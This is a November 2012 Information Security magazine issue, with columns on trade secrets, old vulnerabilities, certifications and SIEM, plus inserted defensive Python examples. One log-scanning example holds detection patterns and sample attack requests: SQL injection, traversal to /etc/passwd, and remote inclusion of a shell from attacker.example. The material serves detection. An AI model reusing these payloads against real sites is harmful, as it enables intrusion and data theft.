INFORMATION SECURITY - Bitpipe
docs.media.bitpipe.com/io_10x/io_103284/item_495004/November ISM_finalV2.pdf


NOVEMBER 2012 • VOLUME 14 • NO. 9

INFORMATION SECURITY

SPECIAL ISSUE: THE SECURITY 7 AWARDS FOR 2012
Seven Outstanding Security Practitioners Offer Words of Wisdom

METASPLOIT: SECURITY SALVATION OR SABOTAGE?

CLOUD SECURITY: TACKLING COMPLIANCE


FROM OUR SPONSORS


www.rsaconference.com/techtarget

Harness Information. Find Connections. Secure Your Data.

Register Now!

As data continues to grow exponentially, the need to manage and protect this information becomes more imperative. RSA® Conference equips you with the tools you need to get ahead of threats to your organization, infrastructure and assets. Over five days, you will explore ways to overcome top security challenges, discover the latest technological advances and collaborate with fellow infosec professionals and experts.

5 days of learning and discovery

350+ innovative exhibitors

220+ illuminating sessions

18 essential tracks

NEW! 30- and 60-minute sessions

NEW! Expanded expo area

Save $700 before Friday, November 16, 2012



Closing Keynote Speaker: Condoleezza Rice, 66th Secretary of State of the United States

Security in Knowledge. Mastering data. Securing the world.


INFORMATION SECURITY • NOVEMBER 2012

IN THIS ISSUE: EDITOR’S DESK • PERSPECTIVES • SCAN • EDUCATION • RANUM • SECURITY 7: SECURITY STANDOUTS OF 2012 • METASPLOIT: SECURITY SALVATION OR SABOTAGE? • CLOUD SECURITY: TACKLING COMPLIANCE

EDITOR’S DESK

Security Stars of 2012
The Security 7 Award honors outstanding individuals in an industry filled with dedicated professionals. BY MARCIA SAVAGE

INFORMATION SECURITY PROS arguably have the hardest job in IT. Not only do they have to keep up with rapidly changing technology trends, but also the relentless pace of new threats. They defend their organizations against adversaries that are often organized with more funds and resources at their disposal.

In many organizations, security pros have to fight hard to be heard by the C-suite and win funding for security projects. When they do get the spotlight, it’s usually because something bad has happened—the company’s network has been hacked or it suffered some type of data loss. Good grief, who would want this job?

Fortunately, the information security field is filled with strong, talented and dedicated people who are up to the challenge. Each year, we honor seven of them with our Security 7 Award. This is the eighth year we’ve handed out the award, which recognizes outstanding information security professionals in seven vertical markets. Some of the industry leaders and luminaries we’ve honored include Gene Spafford, Dorothy Denning, Dave Dittrich, Mark Weatherford, Melissa Hathaway and Chris Hoff.

This year, we’re pleased to add to our Security 7 honor roll Wade Baker of Verizon, Krishnan Chellakarai of Genentech/Roche Pharma, Doug Powell of British Columbia Hydro & Power Authority, David Seidl of Notre Dame, John Streufert of the Department of Homeland Security’s National Cyber Security Division and Preston Wood of Zions Bancorporation.

These winners represent diverse interests, from emerging critical infrastructure protection issues and protecting federal networks, to information sharing and big data security analytics. While they have different focuses, all share a tireless devotion to cybersecurity.

We’re continuing our five-year tradition of having our Security 7 winners write an essay on an information security topic they feel deeply about. The idea is that you get to hear from security leaders in their own words, unfiltered. Each year, we learn a lot from what the winners have to say, and I think you’ll find their essays valuable too.

Our seventh award goes to Ron Knode of CSC, who sadly passed away in May. If you didn’t know Ron Knode, you should read Jim Reavis’ essay on the man, his achievements and his character. As Reavis—executive director of the Cloud Security Alliance—describes him, Ron was a true security warrior. He was multi-talented with an indefatigable dedication to advancing cybersecurity. Ron’s most recent contributions were in the area of cloud security; he led the charge in demanding transparency around cloud provider security controls. His passing is a tremendous loss to the industry. Ron’s passion and energy—like that of our other Security 7 winners—is truly inspiring.

I’ve covered the security industry for the past 12 years, and have been impressed by all the super-smart and enthusiastic people I’ve met. Information security pros have a job that is oftentimes thankless, but they are driven regardless. I’m moving on from Information Security magazine and TechTarget but am grateful for the experience of reporting about such a dynamic industry filled with so many incredible people.

MARCIA SAVAGE is editor of Information Security magazine. Send comments on this column to [email protected].


PERSPECTIVES

Keeping Trade Secrets Secret
Enterprises need to implement best practices to protect their confidential data. BY PETER J. TOREN

THE CONFIDENTIAL INFORMATION and trade secrets of U.S. corporations will be stolen; the only questions are when, and how much damage will the theft cause? Indeed, Congress has heard this year from a slew of witnesses who have testified about the threat posed by foreign hackers who penetrate U.S. companies’ computers and steal valuable data and intellectual property. FBI Director Robert Mueller testified that hacking could soon replace terrorism as the FBI’s primary concern. Gen. Keith Alexander, head of the military’s Cyber Command, characterized the losses caused by cybertheft as the “greatest transfer of wealth in history.”

At the same time, however, employees and other insiders, who by virtue of their position have access to companies’ confidential information, remain the greatest threat to the security of the intellectual property. According to a study I conducted of the 120 prosecutions the government has brought for theft of trade secrets, in more than 90 percent of the prosecutions, the defendant was an “insider” and had access to the trade secrets because he or she either was an employee of the victim, or worked for a vendor or contractor of the victim.

Companies should also be aware that defendants almost always misappropriate trade secrets shortly before resigning from the victim company. In addition, most information is obtained by downloading from the companies’ computer system.

The threats to confidential data are even greater for companies that operate overseas, especially in countries that don’t enforce the protection of intellectual property rights to the same extent as the United States. It is critical, therefore, that U.S. companies operating worldwide adopt a set of best practices for protecting intellectual property that not only applies to their U.S. employees, but to their foreign offices as well.

There are a number of best practices that a company, whether operating domestically or internationally, should adopt:

1. Employees and vendors must be required to sign a code of conduct and confidentiality, and non-disclosure agreements before beginning work. It is critically important to create not only legal obligations for employees to safeguard the company’s confidential information, but also to impress upon them the importance of doing so. Employees should be reminded of their obligation to maintain the secrecy of the company’s proprietary information through regular training and audits.

2. Electronically stored confidential information should be compartmentalized and accessible only on a need-to-know basis. There is simply no reason for employees who, for example, are not working on a particular project to have access to confidential information relating to the project, or for employees who are working on a section of the project to have access to all of the project’s intellectual property.

3. Immediately revoke a departing employee’s ability to access any proprietary information.

4. Conduct an exit interview with the employee and require him or her to attest that he or she is not taking any confidential or proprietary information to a new employer. It is absolutely critical for a company to learn the departing employee’s future plans and, more specifically, whether the departing employee intends to join a competitor or start his or her own company.

5. If suspicious activity on the part of the departing employee is uncovered, consider conducting a full-scale investigation of the former employee’s recent conduct. This should include, for example, a forensic analysis of the employee’s electronic devices, including any company-issued laptop computers.
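The column's two statistics (most thefts are by insiders, and they download the data shortly before resigning) together with steps 3 and 5 above suggest one concrete check a security team can run. The following is an added example, not the column's or its author's code: it compares each departing user's download volume in the two weeks before their notice date against that user's own earlier baseline, and separately reports any access after the notice date, which step 3 says should no longer be possible. The log format, the HR notice feed and all sample records are constructed for illustration.

```python
"""Pre-departure download-spike and post-notice-access check.

Added example, not from the column. Assumes two constructed feeds: a
file-access log of (ISO date, user, bytes downloaded, path) and an HR feed
mapping each departing user to the date their resignation notice was received.
"""
from collections import defaultdict
from datetime import date, timedelta

# Constructed sample file-access log.
ACCESS_LOG = [
    ("2012-08-06", "alice", 1_000_000, "/projects/alpha/spec.docx"),
    ("2012-08-20", "alice", 2_000_000, "/projects/alpha/design.vsd"),
    ("2012-09-03", "alice", 1_000_000, "/projects/alpha/notes.txt"),
    ("2012-09-24", "alice", 150_000_000, "/projects/alpha/source.zip"),    # spike
    ("2012-09-28", "alice", 80_000_000, "/projects/beta/customers.xlsx"),  # spike
    ("2012-10-02", "alice", 5_000_000, "/projects/alpha/spec.docx"),       # after notice
    ("2012-08-01", "bob", 3_000_000, "/projects/beta/plan.pptx"),
    ("2012-09-01", "bob", 3_000_000, "/projects/beta/plan.pptx"),
    ("2012-09-25", "bob", 2_000_000, "/projects/beta/status.docx"),
    ("2012-10-03", "bob", 1_000_000, "/projects/beta/status.docx"),
]

# Constructed HR feed: user -> date the resignation notice was received.
NOTICE_DATES = {"alice": "2012-10-01", "bob": "2012-10-05"}


def daily_totals(log):
    """Sum bytes downloaded per user per calendar day."""
    totals = defaultdict(lambda: defaultdict(int))
    for day, user, nbytes, _path in log:
        totals[user][date.fromisoformat(day)] += nbytes
    return totals


def review_departures(log, notice_dates, window_days=14, baseline_days=60, ratio=3.0):
    """For each departing user, compare the average daily download volume in the
    `window_days` before the notice date with that user's own average over the
    preceding `baseline_days`, and count any bytes moved after the notice.

    Returns {user: {"window_bytes", "baseline_daily_avg", "spike", "post_notice_bytes"}}.
    A user with no baseline activity who suddenly downloads in the window is
    flagged too: a dormant account waking up before a resignation is itself
    worth a look.
    """
    totals = daily_totals(log)
    report = {}
    for user, notice_str in notice_dates.items():
        notice = date.fromisoformat(notice_str)
        win_start = notice - timedelta(days=window_days)
        base_start = win_start - timedelta(days=baseline_days)
        per_day = totals.get(user, {})
        win_bytes = sum(b for d, b in per_day.items() if win_start <= d <= notice)
        base_bytes = sum(b for d, b in per_day.items() if base_start <= d < win_start)
        post_bytes = sum(b for d, b in per_day.items() if d > notice)
        base_avg = base_bytes / baseline_days
        win_avg = win_bytes / window_days
        spike = win_bytes > 0 and (base_avg == 0 or win_avg >= ratio * base_avg)
        report[user] = {
            "window_bytes": win_bytes,
            "baseline_daily_avg": base_avg,
            "spike": spike,
            "post_notice_bytes": post_bytes,  # should be 0 if access was revoked
        }
    return report


if __name__ == "__main__":
    for user, r in review_departures(ACCESS_LOG, NOTICE_DATES).items():
        flags = []
        if r["spike"]:
            flags.append("pre-departure download spike")
        if r["post_notice_bytes"]:
            flags.append("access after notice (revocation gap)")
        print(user, f"{r['window_bytes']:,} bytes in window:", "; ".join(flags) or "ok")
```

The thresholds are starting points; the point is that the comparison is against the user's own history, not a fleet-wide average, so a quiet account that suddenly pulls a project archive stands out.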


It is especially important that U.S. companies operating internationally understand that regardless of the steps undertaken to protect their confidential information, the protection is only as strong as the weakest link; companies must continuously evaluate the situation and implement new protections as the situation warrants. At a minimum, companies, regardless of where they do business, should implement the following additional measures:

■ Physical security measures should include carefully controlled access to facilities containing valuable proprietary and confidential information.

■ Network and computer security should at a minimum include passwords and firewalls to prevent infiltration by hackers and other outside threats.

■ Implementation of a policy that controls the classification and marking of proprietary documents, and access to documents and their physical handling.

■ Training of new hires and current employees, regardless of nationality, as well as security audits to promote compliance with the program’s policies.

Even with best practices for protecting intellectual property, companies are still vulnerable to having their confidential information and trade secrets misappropriated. Accordingly, it is crucial that companies not only continuously re-evaluate their practices, but also consult with security and legal experts in each country in which they do business, to make sure they are not running afoul of any laws and are protecting their valuable information in a manner that preserves all available legal protections. The review should emphasize internal threats and the danger of foreign economic espionage, especially to high-tech companies.

PETER J. TOREN is a partner with Weisbrod, Matteis & Copley in Washington, D.C. He was also a federal prosecutor with the Computer Crime & Intellectual Property Section of the Justice Department and is the author of Intellectual Property & Computer Crimes. Send comments on this column to [email protected].


SCAN: SECURITY COMMENTARY, ANALYSIS AND NEWS

Blast from the Past
Old-school vulnerabilities and configuration blunders continue to plague organizations, experts say. BY ROBERT WESTERVELT

OLDER APPLICATION VULNERABILITIES and long-standing configuration weaknesses are repeatedly haunting organizations, according to penetration testers and security experts, who say the issues are either being ignored or are long forgotten.

Systems configured with open ports for remote access, easily discoverable application vulnerabilities and holes in rarely used server components are just a few of the attack vectors that are coveted by penetration testers to gain access into corporate networks. The common issues are well known by white hat hackers and cybercriminals alike, and often lead to embarrassing, high-profile data breaches, says H.D. Moore, CTO of Rapid7 and creator of the Metasploit penetration testing platform.

“If you look at how far we’ve come over the last 25 to 30 years of doing Internet security, we’re still using unencrypted management protocols for the most part,” Moore says.

Since May, Moore has been probing the Internet, scanning for transmission control protocol (TCP) and user datagram protocol (UDP) services, the Internet communication protocols used by a wide variety of devices, applications and servers. During his probe, he found that Port 8080, an alternative communications channel used by Web services, had a lot of application framework admin interfaces and device admin interfaces exposed to the Internet. Proxy gateways, admin interfaces for embedded devices and a lot of network-attached storage (NAS) admin interfaces were all exposed, says Moore, who spoke about the issues he identified at the recent DerbyCon security conference in Louisville, Ky.


“When new vulnerabilities come out, it’s very fun to watch a small subset of the population patch immediately, and then you see a small section of the populace never patching at all,” Moore says.

Moore discovered over 1,000 clear text passwords exposed to the Internet—passwords that enable anyone to access secure shell servers, databases and retail applications. More than 1.5 million MySQL database management systems were exposed to brute-force password attacks or had default passwords, ripe for any attacker. In all, over 43 million devices were detected that exposed the popular simple network management protocol (SNMP), which provided easy access to routers, addresses and listening ports.

“It’s amazing that something as easy as SNMP, which a lot of vendors will enable on an otherwise totally locked down, patched system, will expose clear text passwords to other servers because you don’t have the services configured properly and no one ever took that into account,” Moore says.

Misconfigured VPNs, poorly deployed encryption, and weak and mishandled passwords can be found at just about any firm, says Jamie Gamble, a senior security consultant at Denver-based security firm Accuvant Labs, who spoke at the SecTor security conference in Toronto, where he discussed the vulnerabilities he commonly exploits during tests with his clients. Gamble, who focuses his time and research on Unix systems, says companies often neglect them because they consider Windows errors a bigger threat.

“I’m using many of the same ways [exploits] that were used in the 1990s,” Gamble says. “Some of the early papers on exploitation can still easily be applied in today’s environments.”

Unix-based systems that provide network authentication could have been configured years ago and easily left with settings that expose a list of user directory passwords to an attacker, Gamble says. Lightweight Directory Access Protocol (LDAP) passwords can often be pulled from regions of memory in a rooted Solaris machine. Even shell password files can be easily cracked.

Network switches are often susceptible to man-in-the-middle attacks.



Network auditing and pen testing sniffer tools have automated the process of carrying out a man-in-the-middle attack, Gamble says.

“This stuff has been made to be so easy that anyone can do it,” Gamble says. “We now have the automated tools to attack networks with fundamental flaws.”

Grayson Lenik, a security consultant at Chicago-based security firm Trustwave, says he often sees e-commerce companies compromised and thousands of credit cards stolen because of a simple coding error that is vulnerable to a SQL injection attack. Remote file inclusion and directory traversal, both old-style attacks, are also very common, Lenik says. A crafty SQL injection attack, combined with other exploits, can pull out large sums of data, helping cybercriminals get past firewalls, pull up a shell and execute code on a remote server.

“Back-end databases have gotten much more powerful and storage is cheaper, but SQL injection is one thing that hasn’t changed,” Lenik says. “We figured out how to stop much of this in 2000, but I still see it regularly.”
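The three old-style attacks Lenik names (SQL injection, remote file inclusion and directory traversal) all leave traces in ordinary web-server access logs, which is where a defender without a WAF can still catch them. The following is an added example, not code from the article or from any firm quoted in it: it parses combined-format log lines and labels requests showing those three patterns. The log lines, hostnames and helper names are constructed; URL decoding is repeated so a doubly encoded `../` is still caught.

```python
"""Flag SQL injection, remote file inclusion and directory traversal attempts
in web-server access-log lines.

Added example, not from the article. The log lines below are constructed in
the common combined log format; the regexes are deliberately small signatures
that show the technique, not a complete rule set.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined log format: ip ident user [time] "METHOD target HTTP/x.y" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)

# Tautology, UNION SELECT, stacked statement, trailing comment, time-based probe.
SQLI_RE = re.compile(
    r"'\s*(or|and)\s+[\w']+\s*=\s*[\w']+"
    r"|union\s+(all\s+)?select"
    r"|;\s*(drop|insert|update|delete)\s"
    r"|--\s*$|/\*.*\*/"
    r"|sleep\s*\(",
    re.IGNORECASE,
)
# A ".." path segment, checked after backslashes are normalised to slashes.
TRAVERSAL_RE = re.compile(r"(^|/)\.\.(/|$)")
# An absolute URL or PHP stream wrapper supplied where a local file is expected.
RFI_RE = re.compile(r"^(https?|ftp|php|data)://", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing, so double encoding
    such as %252e%252e%2f (-> %2e%2e/ -> ../) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return the set of attack labels found in one request target (path + query)."""
    parts = urlsplit(target)
    candidates = [fully_decode(parts.path)]
    candidates += [fully_decode(v) for _k, v in parse_qsl(parts.query, keep_blank_values=True)]
    labels = set()
    for value in candidates:
        if TRAVERSAL_RE.search(value.replace("\\", "/")):
            labels.add("directory_traversal")
        if RFI_RE.match(value.strip()):
            # Caveat: legitimate redirect parameters also carry absolute URLs;
            # in production restrict this check to file/include parameters.
            labels.add("remote_file_inclusion")
        if SQLI_RE.search(value):
            labels.add("sql_injection")
    return labels


def scan_log(lines):
    """Parse access-log lines; return [(ip, target, labels)] for flagged requests."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the whole run
        labels = classify_request(m.group("target"))
        if labels:
            findings.append((m.group("ip"), m.group("target"), labels))
    return findings


# Constructed sample log lines (RFC 5737 documentation addresses, .example hosts).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2012:13:55:36 -0700] "GET /product.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 5123',
    '203.0.113.9 - - [10/Oct/2012:13:56:01 -0700] "GET /images/..%2f..%2fetc/passwd HTTP/1.1" 404 210',
    '198.51.100.7 - - [10/Oct/2012:13:57:12 -0700] "GET /index.php?page=http://attacker.example/shell.txt HTTP/1.1" 200 88',
    '198.51.100.8 - - [10/Oct/2012:13:58:40 -0700] "GET /download.php?file=%252e%252e%2f%252e%252e%2fconfig.php HTTP/1.1" 200 100',
    '192.0.2.3 - - [10/Oct/2012:13:59:02 -0700] "GET /product.php?id=42 HTTP/1.1" 200 5123',
    "not a log line",
]

if __name__ == "__main__":
    for ip, target, labels in scan_log(SAMPLE_LOG):
        print(ip, sorted(labels), target)
```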

ROBERT WESTERVELT is news director of TechTarget’s Security Media Group and SearchSecurity.com. Send comments on this article to [email protected]


Beyond Certifications
Educating the security professional requires far more than a certification exam. BY DOUG JACOBSON AND JULIE A. RURSCH

EDUCATION

ONE OF THE most frequently asked questions we get from students, both prospective and enrolled, is, “What type of security certifications are necessary to be competitive in the field of security?” Although it seems like a simple, valid question that we should have a snap answer for, we believe the students are missing the true question that should be asked: “What value do certifications provide in a security professional’s career?” We also believe that some security professionals can fall prey to the same trap of assuming there are certifications that are the Holy Grail. They, like our students, need to understand what that certification represents and what it doesn’t. They need to understand both the value and shortcomings of certifications.

In some ways, security professionals have the same demands as other employees in any business, government or educational setting. Technology is rapidly and constantly changing, and all employees need to stay current with the latest tools and techniques in their area of expertise to stay at the top of their game. We can represent this continual technology change along an X-axis that extends to infinity. However, unlike most scientists and engineers, for whom the only moving target is ever-changing technology, security professionals incur change along a second Y-axis that represents the growing number of security threats and attack avenues. The rapid movement along both vectors provides security professionals with a constantly changing landscape and, at times, one with which it is almost impossible to keep pace.

The same axiom we use when recruiting prospective students to study security is also the crux of our problem with certifications: The most exciting thing about security is that unlike most science/engineering disciplines, where the laws of physics and nature don’t change, the knowledge in our discipline has constant and rapid change. Here lies both the glory and the curse of the security profession. The joy of our work constantly changing means we also have the constant need to update our skills and knowledge. Additionally, while many scientists and engineers are looking at challenges presented by nature, in security, our challenges are presented by people. These people can be thought of as adversarial and highly motivated. They also only have to find one weakness in a system to gain the upper hand, while we in security have to find all the holes and plug them. So, when we think of security education in practice, we as security professionals do not have a static route to our career; it’s dynamic.

So, how do certificates fit into this? Certificates should be viewed as not an end, but as a measurement of mastery along the pathway of a profession in security. While many educators talk about instilling in students the ability for life-long learning, we can’t just talk the talk—we need to walk the walk. Our students can’t depend upon rote memorization and passing a certification. They need to learn and think independently. Professional development in security is more about continuing education and keeping skills and knowledge current than earning a bunch of letters behind your name.

While this sounds like a denunciation of certifications, it’s not. Certifications have their place. For some individuals, working toward a certification gives them the motivation to learn about something new, with the completion of the test helping them visually demonstrate their learning. Certifications can also be used for measurement in jobs which, in some cases, allow employees to earn more money for their effort to update their skill sets. In addition to earning employees a bump on the pay scale, some jobs require certifications, such as those for law enforcement or expert witnesses. Typically, these certifications require renewals at a predetermined time period, which generally includes continuing education work, practice and a test to keep them.



Over the years, on and off, universities get pressured to teach to a certification. Most security educators believe, as we do, that our place is to provide the basic knowledge that will enable students to continue to learn over their career lifetime. Life-long learning in security requires that students have the ability to move along both vectors in the changing graph of security.

So back to the original question, “Which certification should I get?” The answer should be whichever certification will help you continue to learn and stay on top of what is happening in security. Remember that certifications are nothing more than a milestone along a successful security career path: They represent the path that has been successfully completed. They do not represent the end of the journey, but rather the vastness of the road to travel.

DOUG JACOBSON is a professor in the department of electrical and computer engineering at Iowa State University and director of the Information Assurance Center, which was one of the original seven NSA-certified centers of academic excellence in information assurance education.

JULIE A. RURSCH is a lecturer in the department of electrical and computer engineering at Iowa State University and director of the Iowa State University Information Systems Security Laboratory, which provides security training, testing, and outreach to support business and industry. Send comments on this column to [email protected].


Q&A WITH RANUM

A Chat With Marcus Ranum
Security expert and Information Security magazine columnist goes one-on-one with Anton Chuvakin, a research director in the Gartner for Technical Professionals (GTP) Security and Risk Management Strategies team.

RANUM I’ve been thinking lately that it’s about time for a next-generation SIEM [security information and event management] to come along and overturn the current state of the art. I thought, perhaps, we might fantasize a little bit—while remaining practical—about what such a thing might look like. Avoiding the big data hype, I have to admit that my blood runs cold when I hear marketing people talk about petabytes of data, when we’re barely managing to turn gigabytes of data into megabytes of useful information. It’s definitely the case that our current SIEM solutions are going to be constantly pressured to do more with less, which—in a SIEM context—means reduce data so it’s even more significant.

Short of artificial intelligence, where do you think we’re going to have to take next-generation SIEM systems in order to produce less data that is more significant, while absorbing even more raw input?

CHUVAKIN As you know, my day job includes exactly that kind of thinking. Recently, I wrote a report called SIEM Futures, where I outlined five futures that SIEM has to conquer to become a next-generation system. While you should read the report to see full details, I can outline some of the ideas here. Also, none of these would be completely unheard of because in many cases the future is already here, it’s just unevenly distributed. So, the SIEM of the near future will include expanded context data collection and analysis, distributed intelligence features, the ability to monitor “emerging” IT environments (such as virtual and cloud environments), new and expanded algorithms for historical and real-time analysis, and will be much more useful than today’s SIEM for application security monitoring.

In essence, I’m looking not only at newer and better analysis algorithms—primarily on stored, but also on stream, data—but also at expanded information collection (especially context information that goes beyond resolving usernames into identities and vulnerabilities on assets), as well as being able to operate in newer environments such as hypervisors and deep inside applications, where an IP address means nothing and logs are even more esoteric. These methods and futures can cross-pollinate; for example, new algorithms applied to application log data analysis or shared intelligence about attacks on public clouds.

Despite all those exciting futures, many of today’s environments are still about firewall logs and Unix syslog, so don’t get too excited about the future. I’d venture a guess that for every organization that uses Hadoop, there are doz-ens that still use Windows 2000, and, less likely but still possible, Windows NT 4.0. Regarding the petabytes of data, I’m just as miffed as you are as I see environments where available kilobytes of data are ignored (see the latest Ve-rizon Data Breach Investigations Report for examples). Giving these organiza-tions megabytes, gigabytes, up to petabytes will not change how these people approach security information and utilize SIEM.

RANUM It seems to me that visualization and workflow automation are going to be crucial, yet I am blissfully unaware of really good ways of presenting the kind of in-formation we’ll need to produce from a next generation SIEM. There will need to be at least some kind of sharing model built in, so that some self-generated clustering rules are automatically shared within communities of interest, and perhaps there’s a like/don’t like crowdscoring system for globally promoting analytic rules. That’s my day-dream; how does that match your SIEM nirvana?

CHUVAKIN A long time ago I wrote a blog post on “ideal” SIEM systems. I looked back at it, and I saw some naïve things but also some things that are still true today. Here are some:

■ Logging configuration: The ideal SIEM will find all possible log sources (systems, devices, applications, etc.) and enable the right kind of logging on them according to a high-level policy given to it.


■ Log collection: Will collect all the above logs securely without using any risky super-user access and with little to no impact to networks and systems.

■ Log storage: It can securely store the above logs in the original format for as long as needed and in a manner allowing quick access to them, in both raw and summarized/enriched form.

■ Log analysis: This ideal SIEM will be able to look at all kinds of logs, known to it and previously unseen, from standard and custom log sources, and tell users what they need to know about their environment based on their needs: What is broken? What is hacked? Where? What is in violation of regulations/policies? What will break soon? Who is doing this stuff? The analysis will power all of the following: automated actions, real-time notifications, long-term historical analysis and compliance relevance analysis (this probably requires some form of artificial intelligence).

■ Information presentation: Will distill the above data, information and conclusions generated by the analytic components, and present them in a manner consistent with the user’s role, from operator, to analyst, to engineer, to executive. Interactive visual and drillable text-based data presentation across all log sources. The users can also customize the data presentation based on their wishes and job needs, as well as information perception styles.

■ Automation: The ideal log management tool will be able to take limited automated actions to resolve discovered and confirmed issues as well as generate guidance to users so they know what actions to take when full-auto mode is not appropriate. The responses will range from full-auto actions, to assisted actions (i.e., click here to fix it), to issuing detailed remediation guidance. The output will include a to-do list of discovered items, complete with suggested actions and ordered by priority.

However, let me take this conversation in a somewhat different direction. Most of the successful SIEM projects I’ve seen aren’t successful because they have ideal technology. Similarly, most of the failed projects have failed not because they have crappy SIEM technology. Success or failure of a SIEM project simply depends more heavily on processes and practices, not the tools themselves. As we know, security monitoring can never be automated and attempts to create an ideal tool that will automate it are doomed to fail.

Essentially, some people who buy SIEM boxes don’t use them and then whine that “the product does not do enough.” It is one step above complaining that one’s copy of Microsoft Word keeps failing to write the next great American novel. Or that one’s state of the art DSLR fails to turn one into Ansel Adams.

RANUM “Relevance analysis” sounds good! It reminds me of our quest for “correlation” in system logging. The industry seems to have done a pretty good job of providing linkages between pieces of information, but they seem to mostly be rule-based (i.e., if more than 70 percent of the terms in two events are shared, and they appear within 60 seconds of each other, group them into a cluster.) But as a community we seem to have done a pretty poor job of taking advantage of the pattern-recognition research in AI. I’ve always been disappointed that the security industry seems to be playing it safe and building what we know will work (rule-based systems) instead of shooting for “intelligence amplifying” systems. By that, I mean systems that make hypotheses by generating fuzzy rules, then ask their human operators, “Is this useful?” And then remember and apply the results. Is there anyone doing research in advanced analytics that excites you?

CHUVAKIN A lot of academic research I’ve seen that purports to do that is really quite dumb and not even loosely connected to operational security reality. I’m pretty sure examples of excellent academic research in security data analysis exist; it’s just that my nearly 10-year quest for it came up with essentially nothing. For crying out loud, those academics still use 1998 data sets in 2012. As far as this research is concerned, most SIEM vendors are experimenting with profiling and baselining techniques—essentially old-school anomaly detection. If you were able to do it creatively, use it on log data and produce useful insights.

In general, I want more people to use data mining and text mining—on unparsed logs—for log analysis, and I’ve seen many examples of that almost working in the field. However, nobody has productized it well yet.

RANUM I like your suggestion of the logging system being able to do discovery. It seems to me that a big piece of our log management problem is going to get solved as the “systems challenged” customers move their data to cloud providers where logging and configuration management doctrines are in force. Pushing this stuff into the cloud at least makes massive log aggregation (and cross-customer analysis) a possibility. What do you think the impact of the cloud is going to be?

CHUVAKIN More people actually pull data from the cloud into their traditional on-premise SIEM tools than shove the data up to the cloud from their on-premise log sources. There was another research project I did on security monitoring for public cloud assets and that was one of the key discoveries—and key surprises. It seems like cloud systems will serve as a log source for some time before we learn how to use public cloud resources for data analysis.

This being said, there are a couple of interesting vendors that do log management using a Software as a Service model, aka “log management in the cloud.” These guys seem to be utilizing the advantages of having all their customers’ data in one massive system with essentially unlimited computing power. New analytics do become possible, but I’ll reserve my judgment until I see more examples of that working as well or better than traditional SIEM in today’s environments.

RANUM What direction do you see logging going in that excites you?

CHUVAKIN You know, I’m still excited about log standards, such as common event expression. I feel that unless we get much better analyzing unstructured data—essentially text mining and natural language processing, even though most logs remind me of broken English and not natural language—the standard just has to happen. Also, just about any new analytic technique that actually works on production data—not on stupid fake academic data sets—and on production data volumes, excites me as well.

So I’m feeling hopeful about the standards, despite the long odds and despite you being skeptical about them. I’m also feeling hopeful about increased adoption of tools that analyze and don’t just store data and about people actually using them. By the way, these tools don’t have to be based on Hadoop to be fun, they might well use MySQL or something.

RANUM Anton, thank you so much for your time. It’s always a pleasure.
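Ranum’s description of rule-based correlation in the interview above (group two events when more than 70 percent of their terms are shared and they appear within 60 seconds of each other) is concrete enough to run. The Python below is an added illustration written for this page; it is not code from the interview, the magazine, or any SIEM product. It interprets “terms shared” as the Jaccard overlap of the two events’ whitespace-separated tokens (the interview does not define the measure, so this is an assumption), assumes a year for the year-less syslog timestamps, and runs over a handful of constructed syslog lines.

```python
"""Rule-based event clustering: group two events when more than
SHARE_THRESHOLD of their terms are shared and they occur within
WINDOW_SECONDS of each other.

Added example; not code from the interview or from any SIEM product.
"""
import re
from datetime import datetime, timedelta

SHARE_THRESHOLD = 0.70   # fraction of terms two events must have in common
WINDOW_SECONDS = 60      # max gap between an event and its cluster's latest event
ASSUMED_YEAR = 2012      # assumption: classic syslog timestamps carry no year

# Constructed sample syslog lines (not real log data).
SAMPLE_LOGS = [
    "Nov 12 10:00:01 gw1 sshd[2201]: Failed password for root from 203.0.113.5 port 51234 ssh2",
    "Nov 12 10:00:09 gw1 sshd[2201]: Failed password for root from 203.0.113.5 port 51240 ssh2",
    "Nov 12 10:00:31 gw1 sshd[2201]: Failed password for root from 203.0.113.5 port 51251 ssh2",
    "Nov 12 10:00:40 db1 kernel: eth0: link is up, 1000 Mbps full duplex",
    "Nov 12 10:03:15 gw1 sshd[2205]: Failed password for root from 203.0.113.5 port 51300 ssh2",
]

SYSLOG_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<msg>.*)$")


def parse_event(line, year=ASSUMED_YEAR):
    """Split a classic syslog line into (timestamp, set of terms, raw line)."""
    m = SYSLOG_RE.match(line)
    if not m:
        raise ValueError("not a syslog line: %r" % line)
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    # "terms" are the whitespace-separated tokens after the timestamp, so the
    # hostname, program[pid], message words and numbers all count as terms.
    return ts, frozenset(m.group("msg").split()), line


def term_share(a, b):
    """Jaccard overlap: shared terms divided by all distinct terms in either event."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def cluster_events(lines, threshold=SHARE_THRESHOLD, window=WINDOW_SECONDS):
    """Greedy single pass in time order.  An event joins the first cluster whose
    latest event is within `window` seconds and shares more than `threshold`
    of its terms; otherwise it starts a new cluster.  Returns lists of raw lines."""
    events = sorted((parse_event(l) for l in lines), key=lambda e: e[0])
    clusters = []
    for ev in events:
        ts, terms, _ = ev
        for cl in clusters:
            last_ts, last_terms, _ = cl[-1]
            if ts - last_ts <= timedelta(seconds=window) and term_share(terms, last_terms) > threshold:
                cl.append(ev)
                break
        else:
            clusters.append([ev])
    return [[raw for _, _, raw in cl] for cl in clusters]


if __name__ == "__main__":
    for i, cl in enumerate(cluster_events(SAMPLE_LOGS)):
        print("cluster %d (%d events)" % (i, len(cl)))
        for raw in cl:
            print("   ", raw)
```

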